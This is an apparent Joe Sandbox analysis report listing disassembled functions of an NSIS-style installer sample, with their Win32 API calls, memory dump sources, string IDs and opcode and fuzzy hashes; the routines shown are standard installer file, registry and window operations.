                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                            • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                            • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                            Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                            • wsprintfW.USER32 ref: 00402CD1
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                            • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                            • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                            • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                            Function 0040317D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00403192
                                                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                            • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$CountTickWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 2146148272-3854404225
                                                                                                            • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                            • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                            • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                            • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                            Function 0040617E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061E1
                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                            • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 004061F5
                                                                                                            • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,774D3420,00403512), ref: 00406208
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                            • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                            • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                            Function 004024EE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                            • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                            • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 1453599865-4194326291
                                                                                                            • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                            • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                            • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                            • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                            Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                            • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                                                            • Opcode Fuzzy Hash: f5fb99fc77cb499af78de08433a29d52c657005603a562d7fa302922f95013b5
                                                                                                            • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                                                            Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                            • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                            Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                            • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                            • Opcode Fuzzy Hash: 548b7988845d34974c7096401ec02f3577b62e53f99ad47469e6fcf51543f742
                                                                                                            • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                            Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                            • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                            • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                            • Opcode Fuzzy Hash: 6de236fac86f4cc62a0a7bf8fa179f1b370f6b686e9a3dedb6aaee9d500d3606
                                                                                                            • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                            Function 00403062 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                            • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$PointerWrite
                                                                                                            • String ID: x>A
                                                                                                            • API String ID: 539440098-3854404225
                                                                                                            • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                            • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                            • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                                                                            • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9
                                                                                                            Function 00404978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                            • wsprintfW.USER32 ref: 00404A12
                                                                                                            • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                            • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                            • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                                            • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                            Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                            • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                            • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                            Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                            • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356686001-0
                                                                                                            • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                            • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                                            • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                                            • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                                            Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,774D2EE0,00405792,?,00436800,774D2EE0,00434000), ref: 004059EE
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                                              • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
